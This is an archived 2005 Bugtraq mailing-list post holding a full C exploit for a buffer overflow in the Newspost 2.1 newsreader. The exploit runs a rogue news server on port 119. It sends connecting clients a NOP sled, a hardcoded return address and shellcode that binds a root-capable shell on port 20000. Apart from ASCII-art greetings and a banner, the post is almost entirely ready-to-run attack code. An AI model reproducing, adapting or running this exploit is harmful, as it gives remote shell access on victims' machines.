lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050203000454.3746.qmail@www.securityfocus.com>
Date: 3 Feb 2005 00:04:54 -0000
From: <cybertronic@....net>
To: bugtraq@...urityfocus.com
Subject: RE: SECURITEY.NNOV.RU NewsPost buffer overflow [EXPLOIT]




/* 
02/03/2005 
NOTES: -Newspost "socket_getline()" Buffer Overflow 
Exploit 
 
Client Usage 
------------ 
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n 
cyber -s tronic <file> 
 
Greetz fly to my girlfriend YASMIN H. 
 
                                                    ? 
                                                   ?M 
                   M                              
?MMM 
                   MMm                           
?MMMM 
                   M$$MMm                       
?MMMMM. 
                   MM$$MMMMm                   
MMMMMMMM 
                   `MM$$MMMMMMm               4MMMM$
$MM 
                    MMM$$MMMMMMMMm           ?MMMM$
$MMM 
                     MMM$$$MMMMMMMMm         mMMMM
$MMMM 
                      `MMM$$$MMMMMMMm        MMMM
$MMMM? 
                        MMMM$$$MMMMMMMm      MMM$
$MMM? 
                         `MMMMMMMMMMMMMm     MMMMMMM? 
                           `MMMMMMMMMMMMMm   MMMMMM 
                              `MMMMMMMMMMMM  MMMMM 
                                 `MMMMMMMMMM MMMMM 
                                    `MMMMMMMMMMMM 
                                      MMMMMMMMMMM 
                               mmMMMMMMMMMMMMMMMMM 
                           mmMMMMMMMMMMMMMMMMMMMMMM 
                          ?MMM#MMMMMMMMMMMMMMMMMMMMm 
                        4MMM<º >MMMMMMMMMMMMMMMMMMMM 
                       MMMMMm_ mMMMMMMMMMMMMMMMMMMMM 
                      4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                        MMMMMMMMMMMMMMMMMMMMMMMMMMMM 
       ?Mn               ?MMMMMMMMMMMMMMMMMMMMMMMMM            
?Mnn 
       nM                  `MMMMMMMMMMMMMMMMMMMMMM?              
n? 
        `?                    MMMMMMMMMMMMMMMMM?                
n? 
                                     MMMMMM? 
                                    mtr? 
 
 
     mMMM           nmM                         mM 
   mM??  M          ' M                          n 
 mM$                 nM                       n?MMn?Ä 
4M               m   ?M                      N   ?                           
?` 
m?       `n?    mM  NM?                         NM 
mM        mMm  nm   M??MÄ?     n?Mm   ?n  xnÄ,  ?   
?n  xnÄ  ?Mm   Mn n?     nM   nMm 
 mM        `mMM?   nM     M   nM  ,`   ?n?  y   M    
?n?  y nM  ?   nM  Ä    Ä   ? 
  M?         M'    ?Ä      M  n.,?     nm      nM    
nM     n   M   ?   Ä    ?  n 
   MM?  mM   M    nM Ä    M?  n    ,  nM       ?Ä   
nM      M  nM   M   M   M?  M   n 
     MMM?   M?   nM   MÄÄM     n?nN  ?M       nM   ?M       
`?M?   ??  .N  nM    ?nM? 
           M? 
         n?                                              
cybertronic 2oo5 
        ?                                        
________________ 
                                                    ----------------------/ 
 
 
 
                MMMMMMMMm                            
mMMMMMMM? 
             ?MM$MMMMMMMMMm                        
mMMMMMMMMM$MM` 
             MMMMMMMMMMMMMMMm                    
mMMMMMMMMMMMMMMM 
             MMMMMMMMMMMMMMMMMM                
MMMMMMMMMMMMMMMMMM 
             MMMMMMMMMMMMMMMMMMMM            
MMMMMMMMMMMMMMMMMMMM 
               `MMMMMMMMMMMMMMMMMM          
MMMMMMMMMMM(c)MMMM? 
 
                ºÕÍÄúú  just want to say love you 
dad!  úúÄÍÕº 
*/ 
 
#include <stdio.h> 
#include <strings.h> 
#include <signal.h> 
#include <netinet/in.h> 
#include <netdb.h> 
 
#define RED	"\E[31m\E[1m" 
#define GREEN	"\E[32m\E[1m" 
#define YELLOW	"\E[33m\E[1m" 
#define BLUE	"\E[34m\E[1m" 
#define NORMAL	"\E[m" 
 
#define PORT	119 
#define BACKLOG 5 
 
//92 bytes bindcode port 20000 
char scode[] = 
"\x31\xdb"				// xor	   
ebx, ebx 
"\xf7\xe3"				// mul	   
ebx 
"\xb0\x66"				// mov     
al, 102 
"\x53"					// push    
ebx 
"\x43"					// inc     
ebx 
"\x53"					// push    
ebx 
"\x43"					// inc     
ebx 
"\x53"					// push    
ebx 
"\x89\xe1"				// mov     
ecx, esp 
"\x4b"					// dec     
ebx 
"\xcd\x80"				// int     
80h 
"\x89\xc7"				// mov     
edi, eax 
"\x52"					// push    
edx 
"\x66\x68\x4e\x20"			// push    
word 8270 
"\x43"					// inc     
ebx 
"\x66\x53"				// push    bx 
"\x89\xe1"				// mov     
ecx, esp 
"\xb0\xef"				// mov	   
al, 239 
"\xf6\xd0"				// not	   al 
"\x50"					// push	   
eax 
"\x51"					// push    
ecx 
"\x57"					// push    
edi 
"\x89\xe1"				// mov     
ecx, esp 
"\xb0\x66"				// mov     
al, 102 
"\xcd\x80"				// int     
80h 
"\xb0\x66"				// mov     
al, 102 
"\x43"					// inc	   
ebx 
"\x43"					// inc	   
ebx 
"\xcd\x80"				// int     
80h 
"\x50"					// push	   
eax 
"\x50"					// push	   
eax 
"\x57"					// push	   
edi 
"\x89\xe1"				// mov	   
ecx, esp 
"\x43"					// inc	   
ebx 
"\xb0\x66"				// mov	   
al, 102 
"\xcd\x80"				// int	   
80h 
"\x89\xd9"				// mov	   
ecx, ebx 
"\x89\xc3"				// mov     
ebx, eax 
"\xb0\x3f"				// mov     
al, 63 
"\x49"					// dec     
ecx 
"\xcd\x80"				// int     
80h 
"\x41"					// inc     
ecx 
"\xe2\xf8"				// loop    lp 
"\x51"					// push    
ecx 
"\x68\x6e\x2f\x73\x68"			// push    
dword 68732f6eh 
"\x68\x2f\x2f\x62\x69"			// push    
dword 69622f2fh 
"\x89\xe3"				// mov     
ebx, esp 
"\x51"					// push    
ecx 
"\x53"					// push	   
ebx 
"\x89\xe1"				// mov	   
ecx, esp 
"\xb0\xf4"				// mov	   
al, 244 
"\xf6\xd0"				// not	   al 
"\xcd\x80";				// int     
80h 
 
void cmd ( int connfd ); 
void header (); 
 
int 
main ( int argc, char* argv[] ) 
{ 
	int listenfd, connfd; 
	pid_t childpid; 
	socklen_t clilen; 
	struct sockaddr_in cliaddr, servaddr; 
 
	header (); 
	printf ( "[*] Creating socket..." ); 
	if ( ( listenfd = socket ( AF_INET, 
SOCK_STREAM, 0 ) ) == -1 ) 
	{ 
        	printf ( RED "FAILED!\n" NORMAL ); 
        	exit ( 1 ); 
	} 
	printf ( GREEN "OK!\n" NORMAL ); 
	bzero ( &servaddr, sizeof ( servaddr ) ); 
	servaddr.sin_family = AF_INET; 
	servaddr.sin_addr.s_addr = htonl 
( INADDR_ANY ); 
	servaddr.sin_port = htons ( PORT ); 
 
	bind ( listenfd, ( struct sockaddr * ) 
&servaddr, sizeof ( servaddr ) ); 
	printf ( "[*] Listening..." ); 
	if ( listen ( listenfd, BACKLOG ) == -1 ) 
	{ 
		printf ( RED "FAILED!\n" NORMAL ); 
		exit ( 1 ); 
	} 
	printf ( GREEN "OK!\n" NORMAL ); 
 
	for ( ; ; ) 
	{ 
		clilen = sizeof ( cliaddr ); 
 
		if ( ( connfd = accept ( listenfd, 
( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 ) 
		{ 
			close ( listenfd ); 
			exit ( 1 ); 
		} 
 
		if ( ( childpid = fork ( ) ) == 0 ) 
		{ 
			close ( listenfd ); 
			printf ( "[*]" GREEN " 
Incomming connection from:\t %s\n" NORMAL, inet_ntoa 
( cliaddr.sin_addr ) ); 
			cmd ( connfd ); 
		} 
		close ( connfd ); 
	} 
} 
 
void 
cmd ( int s ) 
{ 
	char in[1024], out[1200]; 
	unsigned long ret = 0xbfffecb8; 
 
	bzero ( &out, 1200 ); 
	memset ( out, 0x90, 956 ); //956 
	memcpy ( out + 956, scode, sizeof 
( scode ) ); 
	strcat ( out, "\x41\x41\x41\x41" ); 
	strncat ( out, ( unsigned char* ) &ret, 4 ); 
	printf ( "[*] Sending Bad Packet [ %u 
bytes ]...", strlen ( out ) ); 
	if ( write ( s, out, strlen ( out ) ) <= 0 ) 
	{ 
		printf ( RED "FAILED!\n" NORMAL); 
		exit ( 1 ); 
	} 
	printf ( GREEN "OK!\n" NORMAL); 
	sleep ( 1 ); 
} 
 
void 
header () 
{ 
	system ( "clear" ); 
	printf ( RED "### " GREEN "# # " YELLOW "###  
" BLUE "### " RED "###  " GREEN "### " YELLOW "###  " 
BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" 
NORMAL); 
	printf ( RED "#   " GREEN "# # " YELLOW "#  # 
" BLUE "#   " RED "#  # " GREEN " #  " YELLOW "#  # " 
BLUE "# # " RED "##  # " GREEN "# " YELLOW "#  \n" 
NORMAL); 
	printf ( RED "#   " GREEN "# # " YELLOW "###  
" BLUE "### " RED "###  " GREEN " #  " YELLOW "###  " 
BLUE "# # " RED "# # # " GREEN "# " YELLOW "#  \n" 
NORMAL); 
	printf ( RED "#   " GREEN " #  " YELLOW "#  # 
" BLUE "#   " RED "# #  " GREEN " #  " YELLOW "# #  " 
BLUE "# # " RED "#  ## " GREEN "# " YELLOW "#  \n" 
NORMAL); 
	printf ( RED "### " GREEN " #  " YELLOW "###  
" BLUE "### " RED "#  # " GREEN " #  " YELLOW "#  # " 
BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" 
NORMAL); 
	printf ( RED "                
cybertronic@....net\n" NORMAL ); 
	printf ( RED "                  ----------(c) 
2005----------\n\n" NORMAL ); 
	printf ( "newspost-2.1\n\n" ); 
} 
 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ